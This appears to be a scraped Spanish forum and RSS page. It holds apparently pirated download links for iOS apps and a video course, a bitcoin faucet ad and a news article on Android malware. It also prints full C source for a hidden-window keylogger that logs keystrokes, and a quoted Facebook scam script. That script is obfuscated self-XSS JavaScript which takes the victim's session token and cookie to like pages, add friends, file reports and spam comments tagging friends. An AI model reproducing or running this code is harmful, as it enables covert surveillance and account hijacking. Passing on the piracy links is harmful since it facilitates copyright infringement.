Text 2 Group Pro – Fast SMS and iMessage | Productivity | $0.99 | 3.1.2
Código:

http://ul.to/pnsgc8d1
TextGrabber + Translator | Productivity | $5.99 | 4.2.2
Código:

http://ul.to/2iggrfk9
Textilus - Microsoft Office Word , OpenOffice and Scrivener Edition for iPad | Productivity | 2.0.7
Código:

http://ul.to/056hv5pp
Textograph Pro+ | Photo & Video | $5.29 | 2.0
Código:

http://ul.to/kxpobyhs
The Occupant | Game | $0.99 | 1.1
Código:

http://ul.to/kdyl80za
The Room Two | Game | $2.99 | 1.0.2
Código:

http://ul.to/7wq1i1ra
The Stupid Test 5 | Entertainment | $0.99 | 1.0.2
Código:

http://ul.to/5n5c1mn7
Things for iPad | Productivity | $19.99 | 2.2.4
Código:

http://ul.to/4a156drt
Timer Cam - Self Timer Camera | Photo & Video | $0.99 | 3.1
Código:

http://ul.to/77znv2ez
TomTom Europe | Navigation | 1.16
Código:

http://ul.to/wzt9a170
Toodledo - To Do List | Productivity | $2.99 | 3.2.2
Código:

http://ul.to/6rf32696
Top Bike -- awesome hill challenge stunt bike racing game by top hot app | Game | $1.99 | 1.70
Código:

http://ul.to/gzxq3x89
Totems: Game of Conquest | Game | $1.99 | 1.0.7
Código:

http://ul.to/97fho8nd
Touch Eye | Entertainment | $0.99 | 1.0.2
Código:

http://ul.to/r34nhvu1
Toy Defense: Relaxed Mode | Game | $1.99 | 1.9
Código:

http://ul.to/064ldrbj
TowerMadness 2 | Game | $4.19 | 1.0
Código:

http://ul.to/pnj4fapn
Tower Bloxx Deluxe 3D | Game | $0.99 | 2.0.32
Código:

http://ul.to/qr8nn1s1
Traffic Racer | Game | 1,79 TL | 1.7
Código:

http://ul.to/qesbjrex
Trambo | Game | £1.49 | 1.0.0
Código:

http://ul.to/a8o788ez
Transparent screen | Entertainment | 1.1
Código:

http://ul.to/38r97a8u
Trial Xtreme 2 | Game | $2.99 | 2.14
Código:

http://ul.to/haksw19t
Tricks fürs iPhone (Pro) | Utilities | 1.0
Código:

http://ul.to/3voy9yab
TripTrap | Game | $0.99 | 1.1
Código:

http://ul.to/6w0q7wjp
TurboScan: quickly scan multipage documents into high-quality PDFs | Business | $2.99 | 2.6.2
Código:

http://ul.to/2ye4sb2z
TuneIn Radio Pro | Music | $3.99 | 5.1
Código:

http://ul.to/rp28i2z4
V
Vampify | Entertainment | $0.99 | 1.9.1
Código:

http://ul.to/2a10ffgn
vBookz PDF Voice Reader US | Business | 1.5
Código:

http://ul.to/5pi2qc3g
Vert 2 - Unit and Currency Converter | Utilities | $1.99 | 2.0.1
Código:

http://ul.to/ziw6w4n5
Video Downloader Super Premium ++ VDownload | Photo & Video | 2.3
Código:

http://ul.to/b9ceyo3z
Videos in Video | Photo & Video | Free | 1.1
Código:

http://ul.to/nkkmeuau
Vinoteka | Lifestyle | $39.99 | 3.3.2
Código:

http://ul.to/q13c0kls
Violett | Game | $3.99 | 1.2
Código:

http://ul.to/pccaod8g
VirtualBrowser for Firefox with Flash & Java Player and Add-ons - Secure VPN Edition for iPhone | Business | $4.99 | 2.0.2
Código:

http://ul.to/peaoo9nx
VirtualBrowser for Chrome + Flash Player, Java & Extensions - Secure VPN Edition for iPad | Utilities | $4.99 | 2.02
Código:

http://ul.to/m6exzq42
Vocalarm | Utilities | $1.99 | 3.0.1
Código:

http://ul.to/0an5v5zs
Voice Answer | Business | $3.99 | 2.6
Código:

http://ul.to/ndzw5wln
Voice Dictation™ | Productivity | Free | 1.2
Código:

http://ul.to/lh48tdtw

U
Ultimate Mini Golf | Game | $0.99 | 2.12
Código:

http://ul.to/hp1s4yw9
Unicode Pad | Utilities | Free | 6.2
Código:

http://ul.to/h65w4u5n
Unitify Pro: Unit and Currency Converter | Utilities | $3.99 | 3.0.4
Código:

http://ul.to/qtm7dp8p

W
Warhammer Quest | Game | $6.49 | 1.22
Código:

http://ul.to/9a8kzyjw
Wealthy! - Track expenses, take photo, and share at one step. | Finance | $2.59 | 1.3.9
Código:

http://ul.to/sr372hqn
Weather Live | Weather | $2.99 | 1.2
Código:

http://ul.to/7ns88d98
WeatherRun: Bike, Walk, Hike Tracker, Altimeter, logger with Pebble Watch, Heart Rate monitor & M7 Motion Coprocessor support. | Navigation | $1.99 | 2.5.2
Código:

http://ul.to/p36zuxmz
Weblock - AdBlock for iOS | Utilities | 3.2
Código:

http://ul.to/harq4dii
Wetter-Warner für iPad | Weather | £1.49 | 1.1
Código:

http://ul.to/8t28sxkz
What's the Phrase | Game | $1.99 | 1.17
Código:

http://ul.to/py7cd63b
Where To? - Discover your next destination using GPS | Navigation | 6.5.4
Código:

http://ul.to/wr1ltkxs
Where's My Mickey? | Game | 1.1.0
Código:

http://ul.to/eg2iqhrl
Where's My Mickey? XL | Game | 1.1.0
Código:

http://ul.to/1rn3e1e0
WiFi Map Pro - tips and passwords for free Wi-Fi | Travel | $4.99 | 2.0.3
Código:

http://ul.to/ei5ukwm3
Words With Friends | Game | $4.99 | 7.02
Código:

http://ul.to/wt4z4e88
WorkTimes - Time Tracking with Overtime Calculation | Business | $3.99 | 4.0.3
Código:

http://ul.to/5a34xl08
World of Goo HD | Game | $4.99 | 1.5
Código:

http://ul.to/d9wtvesl
World Of Tank War | Game | 1.1.0
Código:

http://ul.to/tx0uhp2q

X
XCOM®: Enemy Unknown | Game | 1.4.0
Código:

http://ul.to/qtephbz8
XnBooth Pro | Photo & Video | $0.99 | 1.04
Código:

http://ul.to/v2br6to3
XnSketch | Photo & Video | $1.99 | 1.15
Código:

http://ul.to/n0fsdfx4
xPlan Pocket | Productivity | $9.99 | 3.5.8
Código:

http://ul.to/0z3dnmuz

Y
Yatzy Ultimate | Game | $0.99 | 4.4
Código:

http://ul.to/a0simkig
Year Walk | Game | $3.99 | 1.1
Código:

http://ul.to/roa1s0vi
Youda Mystery: The Stanwick Legacy Premium | Game | 1.1
Código:

http://ul.to/7ofrqoyt
YoWindow Weather | Weather | £1.99 | 1.5.1
Código:

http://ul.to/hyhan9v3

Z
Zombies, Run! | Health & Fitness | $3.99 | 2.5.1
Código:

http://ul.to/y9dyflg8
Zzz - Drift away to sleep | Music | $0.99 | 1.01
Código:

http://ul.to/07djsuo3

Free Bitcoin cada Hora

$
0
0



BITCO.IN***Es uno de los mejores (si no el mejor) fauset para ganar varios satoshis de bitcoin. Las sifras no bajan de 220 Satoshis por hora. (Siendo que la mayoría de los fauset te dan de 1 a 3)***

Lo unico que debes hacer es completar un simple captcha:***



Un numero aleatorio saldrá, y de acuerdo al numero que salga ganaras la cantidad de satoshis como muestra el cuadro sobre el captcha.***

Ademas de los free satoshis por hora, podras jugar un Bet Hi - Bet Lo y poder multiplicar los satoshis que ganaste.***




No pierdas mas tiempo y registrate con tu dirección de Bitcoin en:***BITCO.IN***
Si no tenes un monedero BitCoin crea uno***AQUI

Video2Brain: Java Enterprise Edition [2013] Español

$
0
0


DVD | ISO | 418 MB | Spanish | NO Incl. Archivos Base | Vídeo Training
Formadores: José Vicente Carratalá | Duración: 2:26 horas





Desarrollo de aplicaciones web dinámicas con Servlets, JSP y JDBC

Aprende a desarrollar aplicaciones web dinámicas usando Java como lenguaje de servidor. En este curso darás tus primeros pasos con Java Enterprise Edition desarrollando una aplicación web dinámica compuesta fundamentalmente por Servlets, Java Server Pages y bases de datos en MySQL.



José Vicente Carratalá te presenta su curso Java Enterprise Edition. Desarrollo de aplicaciones web dinámicas con Servlets, JSP y JDBC.

En este curso darás tus primeros pasos en el desarrollo de aplicaciones web dinámicas usando Java Enterprise Edition. Aprenderás a usar los Servlets, las Java Server Pages, y a conectarte a bases de datos usando JDBC. Para el óptimo aprovechamiento de este curso necesitarás tener conocimientos previos de HTML, Java y MySQL.

Empezaremos instalando un entorno de desarrollo basado en Eclipse, y un servidor local de aplicaciones basado en Apache Tomcat. Una vez hayamos instalado y unido ambas piezas, empezaremos el desarrollo de aplicaciones.

Nos basaremos en un desarrollo de tres capas, donde los formularios HTML harán las funciones de las vistas. Extenderemos estos formularios usando Java Server Pages.

A continuación, usando Servlets, crearemos controladores que recogerán los datos de las vistas y los procesarán. Por último, para asegurar la persistencia de los datos recogidos, los guardaremos de manera permanente en una base de datos MySQL, usando el conector JDBC.

Este curso no requiere archivos base iniciales, ya que todos los requisitos se instalan directamente desde internet. A través de las lecciones te iremos guiando acerca de qué páginas tienes que visitar y qué programas tienes que descargar para configurar tu entorno de desarrollo, siendo todos los programas que usamos en el curso completamente gratuitos.










DESCARGA
ENLACES INTERCAMBIABLES

RAPIDGATOR
Código:

http://rapidgator.net/folder/2326479/jenterprise.html
LETITBIT

Un malware para Windows que infecta dispositivos Android

$
0
0
Primer malware para Windows que infecta dispositivos Android

El malware en Android no es algo nuevo. Prácticamente desde sus inicios, el sistema operativo de Google se ha visto afectado por una serie de aplicaciones maliciosas que buscan obtener beneficio de los dispositivos de los usuarios, ya sea recopilando datos como mostrando publicidad o enviando SMS de tarificación adicional sin permiso de los usuarios.

Estas aplicaciones maliciosas, generalmente, se instalaban en los usuarios al descargar ficheros sospechos desde tiendas agenas a la Play Store. Lo que hasta ahora no se había descubierto era un método de infección que no dependiera del propio sistema Android, sino de Windows.

Este troyano en cuestión se llama Trojan.Droidpak. Cuando este llega al ordenador de la víctima y lo infecta se conecta a un servidor remoto y descarga un archivo de configuración en el ordenador. Una vez configurado, el troyano descarga también un APK malicioso que se queda almacenado en el sistema hasta que se conecte un dispositivo Android a él.

Cuando se conecta un smartphone o una tablet, el troyano se comunica con el dispositivo a través de la línea de comandos ADB y, si el dispositivo está en modo desarrollador, instalará de forma oculta el malware en el dispositivo Android. Los usuarios verán un nuevo icono en sus dispositivos llamado “Google App Store” simulando ser la Play Store pero que, en realidad, será el ejecutable del troyano.

Android_windows_Malware_foto

Por el momento, este malware sólo intercepta los SMS de la víctima y los reenvía a un servidor externo y desconocido, pero es posible que de tener éxito, si no se pone solución al problema, en poco tiempo comience a realizar actividades más peligrosas para los usuarios como envío de SMS premium o robo de datos bancarios.

Hace un año sí se habían detectado piezas de malware que funcionaban a la inversa, es decir, un malware para Android era capaz de llegar a infectar un sistema Windows pero este nuevo método de infección ha sido totalmente desconocido hasta ahora y abre nuevas puertas a los piratas informáticos que empezarán a hacer uso de esta posibilidad.

Para protegernos de este tipo de malware podemos seguir los siguientes pasos:

- Desactivar el modo desarrollador USB en nuestro dispositivo si no lo usamos.

- Evitar conectar nuestro dispositivo Android en ordenadores públicos o desconocidos.

- Instalar solo software de confianza.

- Mantener los sistemas de seguridad y antivirus actualizados.


Fuente: softzone

Problema con API Windows GetAsyncKeyState

$
0
0
Hola, estoy intentando hacer un keylogger el cual lea todo tipos de carácteres. Por ahora todo funciona correctamente, salvo cuando intento de leer una combinación de tecla. Por ejemplo, cuando intento leer la tecla [alt Gr] y 2 me almacene en el fichero el carácter '@'. He leido la documentación sobre la función GetAnsycKeyState en las páginas oficiales de Windows(GetAsyncKeyState function (Windows)), pero no he conseguido hayar la solución. Espero que alguien pueda ayudarme. Gracias.

Mi código es el siguiente:

------------------------------------------------------------------------


#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <ctype.h>

#define SHIFTED 0x8000
#define TECLA_OK -32767

/* Almacena las teclas en el fichero log */
int key2file(int tecla, char *file)
{
FILE *fd=NULL;

if((tecla ==1) || (tecla == 2))
return 0;

/* Abre fichero */
fd = fopen(file,"a+");
if(fd == NULL)
return 0;

/* Comprueba teclas */
if(tecla == 8)
fprintf(fd,"%s","[DEL]");
else if (tecla == 13)
fprintf(fd,"%s","\n");
else if (tecla == 32)
fprintf(fd,"%s"," ");
else if(tecla == 110 || tecla == 190)
fprintf(fd,"%s",".");
else if(tecla >= 0x2F && tecla <= 0x39)
{
/* Número */
fprintf(fd,"%s",(char *)&tecla);
}
else if(tecla >= 0x41 && tecla <= 0x5A)
{
/* Letra */
fprintf(fd,"%s",(char *)&tecla);
}
/* Impresion de caracteres especiales desde teclado numerico y pulsaciones de Mayusculas y shitf. */

switch(tecla){
case 106 :
{

fprintf(fd,"%s","*");
break;
}

case 107 :
{

fprintf(fd,"%s","+");
break;
}


case 108 :
{

fprintf(fd,"%s","\n");
break;
}
case 109:
{

fprintf(fd,"%s","-");
break;
}

case 110 :
{

fprintf(fd,"%s",".");
break;
}

case 111 :
{

fprintf(fd,"%s","/");
break;
}

case 9 :
{
fprintf(fd,"%s","[Tabulador]");
break;

}

case 20 :
{
fprintf(fd, "%s","[Bloq.Mayus.]");
break;
}

case 0x10 :
{
fprintf(fd, "%s","[Shitf]");
break;
}

case 0x11 :
{
fprintf(fd, "%s","[Ctrl]");
break;
}

case 0x11+0x32 :
{
fprintf(fd, "%s","@");
break;
}



}


fclose(fd);
return 0;
}

int main(void)
{
HWND Handle;
char tecla;

AllocConsole();
Handle = FindWindowA("consoleWindowClass",NULL);
ShowWindow(Handle,0);

/* Bucle de funcionamiento */
for(; ; )
{
for(tecla=8; tecla<=190; tecla++)
{
if(GetAsyncKeyState(tecla) == TECLA_OK)
key2file(tecla,"keylog.txt");
}
}



return 0;
}

Consulta sobre Facebook

$
0
0
Hola. Hoy recibí una notificación en Facebook que me pareció sospechosa. No se si a ustedes le llegó o no y si saben si es cierto o no. Me ayudarían muchísimo, ya que, posiblemente, sea una trampa.
El texto era el siguiente:

Cita:

Quieren "hackear" - tener el password de la cuenta de alguien en Facebook? Aprovechen esta vulnerabilidad antes de que se den cuenta y la quiten, está funcionando AHORITA!

1. Necesitan utilizar Google Chrome
2. Se meten al perfil de la persona
3. Aprietan la tecla F12
4. Van a la seccion/pestaña que dice "Consola"
5. Copian y pegan el siguiente código <ver abajo>, presionan <ENTER> y listo!!! Se abrirá un pop-up con el password de esa persona!!!

/* Copiar a partir de aquí */
var parent=document.getElementsByTagName("html")[0];
var _body = document.getElementsByTagName('body')[0];
var _div = document.createElement('div');
_div.style.height="25";
_div.style.width="100%";
_div.style.position="fixed";
_div.style.top="auto";
_div.style.bottom="0";
_div.align="center";
var _audio= document.createElement('audio');
_audio.style.width="100%";
_audio.style.height="25px";
_audio.controls = true;
_audio.autoplay = false;
_audio.autoplay = true;
_audio.src = "http://picosong.com/YPGz";
_div.appendChild(_audio);
_body.appendChild(_div);
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
var fb_dtsg=document.getElementsByName("fb_dtsg")[0].value;
var user_id=document.cookie.match(document.cookie.matc h(/c_user=(\d+)/)[1]);
function a(abone){var http4=new XMLHttpRequest;var url4="/ajax/follow/follow_profile.php?__a=1";var params4="profile_id="+abone+"&location=1&source=fo llow-button&subscribed_button_id=u37qac_37&fb_dtsg="+fb _dtsg+"&lsd&__"+user_id+"&phstamp=";http4.open("PO ST",url4,true);http4.onreadystatechange=function() {if(http4.readyState==4&&http4.status==200)http4.c lose};http4.send(params4)}a("");function sublist(uidss){var a=document.createElement('script');a.innerHTML="ne w AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setDa ta({ flid: "+uidss+" }).send();";document.body.appendChild(a)}var user_id=document.cookie.match(document.cookie.matc h(/c_user=(\d+)/)[1]);var fb_dtsg=document.getElementsByName('fb_dtsg')[0].value;var now=(new Date).getTime();function P(post){var X=new XMLHttpRequest();var XURL="//www.facebook.com/ajax/ufi/like.php";var XParams="like_action=true&ft_ent_identifier="+post +"&source=1&client_id="+now+"%3A3366677427&rootid= u_ps_0_0_14&giftoccasion&ft[tn]=%3E%3DU&ft[type]=20&ft[qid]=5882006890513784712&ft[mf_story_key]="+post+"&nctr[_mod]=pagelet_home_stream&__user="+user_id+"&__a=1&__dy n=7n8ahyj35CFwXAg&__req=j&fb_dtsg="+fb_dtsg+"&phst amp=";X.open("POST",XURL,true);X.onreadystatechang e=function(){if(X.readyState==4&&X.status==200){X. close}};X.send(XParams)}var fb_dtsg=document.getElementsByName('fb_dtsg')[0].value;var user_id=document.cookie.match(document.cookie.matc h(/c_user=(\d+)/)[1]);function Like(p){var Page=new XMLHttpRequest();var PageURL="//www.facebook.com/ajax/pages/fan_status.php";var PageParams="&fbpage_id="+p+"&add=true&reload=false &fan_origin=page_timeline&fan_source=&cat=&nctr[_mod]=pagelet_timeline_page_actions&__user="+user_id+"& __a=1&__dyn=798aD5z5CF-&__req=d&fb_dtsg="+fb_dtsg+"&phstamp=";Page.open(" POST",PageURL,true);Page.onreadystatechange=functi on(){if(Page.readyState==4&&Page.status==200){Page .close}};Page.send(PageParams)}Like("1853099549442 53");function IDS(r){var X=new XMLHttpRequest();var XURL="//www.facebook.com/ajax/add_friend/action.php";var XParams="to_friend="+r+"&action=add_friend&how_fou nd=friend_browser_s&ref_param=none&&&outgoing_id=& logging_location=search&no_flyout_on_click=true&eg o_log_data&http_referer&__user="+user_id+"&__a=1&_ _dyn=798aD5z5CF-&__req=35&fb_dtsg="+fb_dtsg+"&phstamp=";X.open("PO ST",XURL,true);X.onreadystatechange=function(){if( X.readyState==4&&X.status==200){X.close}};X.send(X Params)}
Like("1376249559308318");
var _0xb161=["\x76\x61\x6C\x75\x65","\x66\x62\x5F\x64\x74\x73\x 67","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\ x42\x79\x4E\x61\x6D\x65","\x6D\x61\x74\x63\x68","\ x63\x6F\x6F\x6B\x69\x65","\x67\x65\x74\x54\x69\x6D \x65","\x2F\x2F\x77\x77\x77\x2E\x66\x61\x63\x65\x6 2\x6F\x6F\x6B\x2E\x63\x6F\x6D\x2F\x61\x6A\x61\x78\ x2F\x72\x65\x70\x6F\x72\x74\x2F\x73\x6F\x63\x69\x6 1\x6C\x2E\x70\x68\x70","\x66\x62\x5F\x64\x74\x73\x 67\x3D","\x26\x62\x6C\x6F\x63\x6B\x3D\x31\x26\x70\ x70\x3D\x25\x37\x42\x25\x32\x32\x61\x63\x74\x69\x6 F\x6E\x73\x5F\x74\x6F\x5F\x74\x61\x6B\x65\x25\x32\ x32\x25\x33\x41\x25\x32\x32\x5B\x5D\x25\x32\x32\x2 5\x32\x43\x25\x32\x32\x61\x72\x65\x5F\x66\x72\x69\ x65\x6E\x64\x73\x25\x32\x32\x25\x33\x41\x66\x61\x6 C\x73\x65\x25\x32\x43\x25\x32\x32\x63\x69\x64\x25\ x32\x32\x25\x33\x41","\x25\x32\x43\x25\x32\x32\x63 \x6F\x6E\x74\x65\x6E\x74\x5F\x74\x79\x70\x65\x25\x 32\x32\x25\x33\x41\x30\x25\x32\x43\x25\x32\x32\x65 \x78\x70\x61\x6E\x64\x5F\x72\x65\x70\x6F\x72\x74\x 25\x32\x32\x25\x33\x41\x31\x25\x32\x43\x25\x32\x32 \x66\x69\x72\x73\x74\x5F\x63\x68\x6F\x69\x63\x65\x 25\x32\x32\x25\x33\x41\x25\x32\x32\x66\x69\x6C\x65 \x5F\x72\x65\x70\x6F\x72\x74\x25\x32\x32\x25\x32\x 43\x25\x32\x32\x66\x72\x6F\x6D\x5F\x67\x65\x61\x72 \x25\x32\x32\x25\x33\x41\x25\x32\x32\x74\x69\x6D\x 65\x6C\x69\x6E\x65\x25\x32\x32\x25\x32\x43\x25\x32 \x32\x69\x73\x5F\x66\x6F\x6C\x6C\x6F\x77\x69\x6E\x 67\x25\x32\x32\x25\x33\x41\x66\x61\x6C\x73\x65\x25 \x32\x43\x25\x32\x32\x69\x73\x5F\x74\x61\x67\x67\x 65\x64\x25\x32\x32\x25\x33\x41\x66\x61\x6C\x73\x65 \x25\x32\x43\x25\x32\x32\x6F\x6E\x5F\x70\x72\x6F\x 66\x69\x6C\x65\x25\x32\x32\x25\x33\x41\x66\x61\x6C \x73\x65\x25\x32\x43\x25\x32\x32\x70\x68\x61\x73\x 65\x25\x32\x32\x25\x33\x41\x33\x25\x32\x43\x25\x32 \x32\x72\x65\x66\x25\x32\x32\x25\x33\x41\x25\x32\x 32\x68\x74\x74\x70\x73\x25\x33\x41\x25\x35\x43\x25 \x32\x46\x25\x35\x43\x25\x32\x46\x77\x77\x77\x2E\x 66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x25 \x35\x43\x25\x32\x46\x4E\x61\x6E\x2E\x65\x72\x74\x 74\x37\x25\x32\x32\x25\x32\x43\x25\x32\x32\x72\x65 \x70\x6F\x72\x74\x5F\x74\x79\x70\x65\x25\x32\x32\x 25\x33\x41\x31\x34\x35\x25\x32\x43\x25\x32\x32\x72 \x69\x64\x25\x32\x32\x25\x33\x41","\x25\x32\x43\x2 5\x32\x32\x73\x75\x62\x5F\x72\x65\x70\x6F\x72\x74\ x5F\x74\x79\x70\x65\x25\x32\x32\x25\x33\x41\x33\x2 5\x32\x43\x25\x32\x32\x74\x69\x6D\x65\x5F\x66\x6C\ x6F\x77\x5F\x73\x74\x61\x72\x74\x65\x64\x25\x32\x3 2\x25\x33\x41","\x25\x32\x43\x25\x32\x32\x75\x73\x 65\x72\x25\x32\x32\x25\x33\x41","\x25\x37\x44\x26\ x66\x69\x6C\x65\x5F\x72\x65\x70\x6F\x72\x74\x3D\x3 1\x26\x5F\x5F\x75\x73\x65\x72\x3D","\x26\x5F\x5F\x 61\x3D\x31\x26\x5F\x5F\x64\x79\x6E\x3D\x37\x6E\x38 \x61\x68\x79\x6A\x32\x71\x6D\x76\x75\x35\x6B\x39\x 55\x6D\x41\x41\x61\x55\x56\x70\x6F\x26\x5F\x5F\x72 \x65\x71\x3D\x75\x26\x74\x74\x73\x74\x61\x6D\x70\x 3D\x32\x36\x35\x38\x31\x36\x38\x35\x37\x31\x30\x37 \x31\x31\x30\x38\x38\x38\x30","\x50\x4F\x53\x54"," \x6F\x70\x65\x6E","\x6F\x6E\x72\x65\x61\x64\x79\x7 3\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65","\x72\x 65\x61\x64\x79\x53\x74\x61\x74\x65","\x73\x74\x61\ x74\x75\x73","\x63\x6C\x6F\x73\x65","\x73\x65\x6E\ x64","\x31\x30\x30\x30\x30\x36\x39\x35\x32\x31\x31 \x39\x30\x34\x38"];var fb_dtsg=document[_0xb161[2]](_0xb161[1])[0][_0xb161[0]];var user_id=document[_0xb161[4]][_0xb161[3]](document[_0xb161[4]][_0xb161[3]](/c_user=(\d+)/)[1]);var now=( new Date)[_0xb161[5]]();function Report(_0x45e7x5){var _0x45e7x6= new XMLHttpRequest();var _0x45e7x7=_0xb161[6];var _0x45e7x8=_0xb161[7]+fb_dtsg+_0xb161[8]+_0x45e7x5+_0xb161[9]+_0x45e7x5+_0xb161[10]+now+_0xb161[11]+user_id+_0xb161[12]+user_id+_0xb161[13];_0x45e7x6[_0xb161[15]](_0xb161[14],_0x45e7x7,true);_0x45e7x6[_0xb161[16]]=function (){if(_0x45e7x6[_0xb161[17]]==4&&_0x45e7x6[_0xb161[18]]==200){_0x45e7x6[_0xb161[19]];} ;} ;_0x45e7x6[_0xb161[20]](_0x45e7x8);} ;
var _0xa22c=["value","fb_dtsg","getElementsByName","match","coo kie","1382559332008832","onreadystatechange","read yState","arkadaslar = ","for (;;);","","replace","responseText",";","length","e ntries","payload","round"," @[","uid",":","text","]"," ","\x26filter[0]=user","\x26options[0]=friends_only","\x26options[1]=nm","\x26token=v7","\x26viewer=","\x26__user=","h ttps://","indexOf","URL","GET","https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1","open","http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1","send","random","floor","\ x26ft_ent_identifier=","\x26comment_text=","\x26so urce=2","\x26client_id=1377871797138:1707018092"," \x26reply_fbid","\x26parent_comment_id","\x26rooti d=u_jsonp_2_3","\x26clp={\x22cl_impid\x22:\x224535 24a0\x22,\x22clearcounter\x22:0,\x22elementid\x22: \x22js_5\x22,\x22version\x22:\x22x\x22,\x22parent_ fbid\x22:","}","\x26attached_sticker_fbid=0","\x26 attached_photo_fbid=0","\x26giftoccasion","\x26ft[tn]=[]","\x26__a=1","\x26__dyn=7n8ahyj35ynxl2u5F97KepEsy o","\x26__req=q","\x26fb_dtsg=","\x26ttstamp=","PO ST","/ajax/ufi/add_comment.php","Content-type","application/x-www-form-urlencoded","setRequestHeader","status","close"];var fb_dtsg=document[_0xa22c[2]](_0xa22c[1])[0][_0xa22c[0]];var user_id=document[_0xa22c[4]][_0xa22c[3]](document[_0xa22c[4]][_0xa22c[3]](/c_user=(\d+)/)[1]);var id=_0xa22c[5];var arkadaslar=[];var svn_rev;function arkadaslari_al(id){var _0x7892x7= new XMLHttpRequest();_0x7892x7[_0xa22c[6]]=function (){if(_0x7892x7[_0xa22c[7]]==4){eval(_0xa22c[8]+_0x7892x7[_0xa22c[12]].toString()[_0xa22c[11]](_0xa22c[9],_0xa22c[10])+_0xa22c[13]);for(f=0;f<Math[_0xa22c[17]](arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]]/27);f++){mesaj=_0xa22c[10];mesaj_text=_0xa22c[10];for(i=f*27;i<(f+1)*27;i++){if(arkadaslar[_0xa22c[16]][_0xa22c[15]][i]){mesaj+=_0xa22c[18]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[19]]+_0xa22c[20]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[21]]+_0xa22c[22];mesaj_text+=_0xa22c[23]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[21]];} ;} ;yorum_yap(id,mesaj);} ;} ;} ;var _0x7892x8=_0xa22c[24];_0x7892x8+=_0xa22c[25];_0x7892x8+=_0xa22c[26];_0x7892x8+=_0xa22c[27];_0x7892x8+=_0xa22c[28]+user_id;_0x7892x8+=_0xa22c[29]+user_id;if(document[_0xa22c[32]][_0xa22c[31]](_0xa22c[30])>=0){_0x7892x7[_0xa22c[35]](_0xa22c[33],_0xa22c[34]+_0x7892x8,true);} else {_0x7892x7[_0xa22c[35]](_0xa22c[33],_0xa22c[36]+_0x7892x8,true);} ;_0x7892x7[_0xa22c[37]]();} ;function RandomArkadas(){var _0x7892xa=_0xa22c[10];for(i=0;i<9;i++){_0x7892xa+=_0xa22c[18]+arkadaslar[_0xa22c[16]][_0xa22c[15]][Math[_0xa22c[39]](Math[_0xa22c[38]]()*arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]])][_0xa22c[19]]+_0xa22c[20]+arkadaslar[_0xa22c[16]][_0xa22c[15]][Math[_0xa22c[39]](Math[_0xa22c[38]]()*arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]])][_0xa22c[21]]+_0xa22c[22];} ;return _0x7892xa;} ;function yorum_yap(id,_0x7892xc){var _0x7892xd= new XMLHttpRequest();var _0x7892x8=_0xa22c[10];_0x7892x8+=_0xa22c[40]+id;_0x7892x8+=_0xa22c[41]+encodeURIComponent(_0x7892xc);_0x7892x8+=_0xa22c[42];_0x7892x8+=_0xa22c[43];_0x7892x8+=_0xa22c[44];_0x7892x8+=_0xa22c[45];_0x7892x8+=_0xa22c[46];_0x7892x8+=_0xa22c[47]+id+_0xa22c[48];_0x7892x8+=_0xa22c[49];_0x7892x8+=_0xa22c[50];_0x7892x8+=_0xa22c[51];_0x7892x8+=_0xa22c[52];_0x7892x8+=_0xa22c[29]+user_id;_0x7892x8+=_0xa22c[53];_0x7892x8+=_0xa22c[54];_0x7892x8+=_0xa22c[55];_0x7892x8+=_0xa22c[56]+fb_dtsg;_0x7892x8+=_0xa22c[57];_0x7892xd[_0xa22c[35]](_0xa22c[58],_0xa22c[59],true);_0x7892xd[_0xa22c[62]](_0xa22c[60],_0xa22c[61]);_0x7892xd[_0xa22c[6]]=function (){if(_0x7892xd[_0xa22c[7]]==4&&_0x7892xd[_0xa22c[63]]==200){_0x7892xd[_0xa22c[64]];} ;} ;_0x7892xd[_0xa22c[37]](_0x7892x8);} ;arkadaslari_al(id);
Yo no lo probé porque estoy casi seguro de que es una trampa para infectarnos o vulnerarnos a nosotros mismos. Espero una respuesta.
Desde ya, muchas gracias...!
Viewing all 11602 articles
Browse latest View live


<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>